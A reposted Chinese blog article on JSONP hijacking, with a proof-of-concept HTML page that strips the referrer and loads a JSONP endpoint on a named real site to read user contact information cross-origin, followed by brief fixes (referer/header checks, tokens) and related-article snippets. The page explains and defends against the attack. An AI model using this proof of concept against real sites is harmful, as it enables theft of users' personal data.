JSONP劫持

最新推荐文章于 2024-02-22 20:35:08 发布
最新推荐文章于 2024-02-22 20:35:08 发布
阅读量115 收藏
点赞数
文章标签: json 后端
原文链接:http://www.cnblogs.com/huim/p/11005938.html
版权

发出空refer的POC

<!DOCTYPE html>
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>

<script>
function asd(json){
    alert(JSON.stringify(json));
}

</script>
<script src="https://jiameng.58.com/collect/contactInfo?callback=asd"></script>
</body>
</html>

修复

  • 验证refer或者header
  • token
场景 APP调用的后端接口存在jsonp劫持

在该场景中,APP没有统一设置refer,也即大部分请求没有refer。
这导致了refer不可取。
没有设置refer,意味着所有请求其实和第三方来源请求都是一样的,服务器也分不清。
最后的想法,APP端通常很多奇怪的header,而csrf/jsonp劫持的payload难以设置header,所以可以判断header。

为什么难以发出自定义header的请求

转载于:https://www.cnblogs.com/huim/p/11005938.html

Js_123456789
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7576
​介绍 JSONPJSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。 更通俗的说法:JSONP 就是利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
详解JSONJSONP劫持以及解决方法
10-17
主要介绍了详解JSONJSONP劫持以及解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
jsonp劫持
m0_51553670的博客
07-29 1415
JSON指的是JavaScript对象表示法( JavaScript Object Notation)JSON是轻量级的文本数据交换格式JSON是存储和交换文本信息的语法,类似XML但JSON比XML更小、更快、更易解析C、Python、C++、Java、PHP、Go等编程语言都支持JSON几乎所有编程语言都有解析JSON的库,而在JavaScript中,我们可以直接使用JSON,因为JavaScript内置了JSON的解析。
Jsonp劫持
Sentiment的博客
07-25 716
我们知道,在JSONP跨域中,我们是可以传入一个函数名的参数如callback,然后JSONP端点会根据我们的传参动态生成JSONP数据响应回来。如果JSONP端点对于用于传入的函数名参数callback处理不当,如未正确设置响应包的Content-Type、未对用户输入参数进行有效过滤或转义时,就会导致XSS漏洞的产生。jsonp.php} else {请求后触发xss,此时发现php默认的content-type为text/html。
web前端安全性——JSONP劫持
最新发布
qq_53911056的博客
02-22 1110
JSONP劫持的防护 (1)限制referer 前端可以通过设置document.referrer属性来限制Referer。虽然这并不能阻止攻击者伪造Referer,但可以增加一层防护。 (2)使用token 在前端,你可以通过添加一个自定义的token参数来增强JSONP请求的安全性。
浅谈CSRF跨域读取型漏洞之JSONP劫持
记录学习,一起进步
03-06 783
CSRF跨域读取型漏洞之JSONP劫持
详解JSONJSONP劫持以及解决方法.docx
01-22
详解JSONJSONP劫持以及解决方法.docx
jsonp
01-08
下面和大家一起探讨JSONP的知识。首先,我们需要了解一下什么是JSONPJsonp(JSON with Padding) 是 json 的一种”使用模式”,可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 为什么要使用JSONP跨域...
JSONP之我见
12-12
JSONP: 本地html文件要获取xxx网站(跨域)数据时使用的方法。 跨域问题: 外部服务器的数据只能用外部服务器中的js访问,本地js无法用XMLHttpRequest()访问。 外部服务器中的Web服务提供JSON数据,比如在...
jsonp原理及使用
10-26
jsonp 全称是JSON with Padding,是为了解决跨域请求资源而产生的解决方案。下面让我们了解一下是如何使用的吧。
JSONP 原理
01-08
JSONP 是一种 需要后端配合的 跨域请求解决方案 基于浏览器的同源策略 如果你在发送ajax请求资源时 (协议,域名,端口), 只要有一个和你的本域不同就会被认为是在进行跨域请求 发生跨域请求时,服务端response的数据会...
JSONP简单调用实例
12-04
JSONP简单调用实例。ASP.NET和纯HTML。jQuery的$.ajax的调用!jsonP说白了,就是在json字符串外面包上一个:参数名称+左右括弧!只是包了个:jsonpCallback() 而已! 相关文章:...
JSONP实现原理
11-28
JSONP(JSON with Padding)是JSON的一种“使用模式”,可用于解决主流浏览器的跨域数据访问的问题。由于同源策略,一般来说位于 server1.example.com 的网页无法与不是 server1.example.com的服务器沟通,而 HTML 的...
ajaxjsonp.js
07-25
jQuery跨域访问,封装的ajax 代码,我使用的jQuery版本是1.11.3
JavaScript中模拟实现jsonp
10-24
主要介绍了JavaScript中模拟实现jsonp,本文直接给出实现代码,代码中包含详细注释,需要的朋友可以参考下
json劫持payload
Js_123456789的博客
03-26 356
<html> <head>jsonp hijacking</head> <body> <script> function jj(json){ alert(JSON.stringify(json)); } </script> <script src="https...
JSONP 劫持漏洞实例
11-15 2002
0x01 Jsonp简介 Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 为什么我们从不同的域(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略。 同源策略,它是由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略。 ...
csrf的jsonp利用
07-27
JSONP利用CSRF漏洞的原理是通过利用JSONP的特性,即可以跨域读取数据的能力,来进行恶意操作。当一个网站使用JSONP来获取数据时,它会在请求中包含一个callback函数名作为参数。攻击者可以构造一个恶意网页,在其中通过script标签发起一个JSONP请求,将callback函数指向自己的恶意代码。当用户访问这个恶意网页时,浏览器会执行其中的JSONP请求,从而触发恶意代码的执行。由于JSONP请求会携带用户的身份凭证(如cookie),攻击者可以利用这些凭证进行恶意操作,比如修改用户资料、进行授权登录等。这就是JSONP利用CSRF漏洞的原理。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [浅谈CSRF跨域读取型漏洞之JSONP劫持](https://blog.csdn.net/qq_63701832/article/details/129372608)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [JSONP 劫持](https://blog.csdn.net/weixin_38885346/article/details/116333516)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值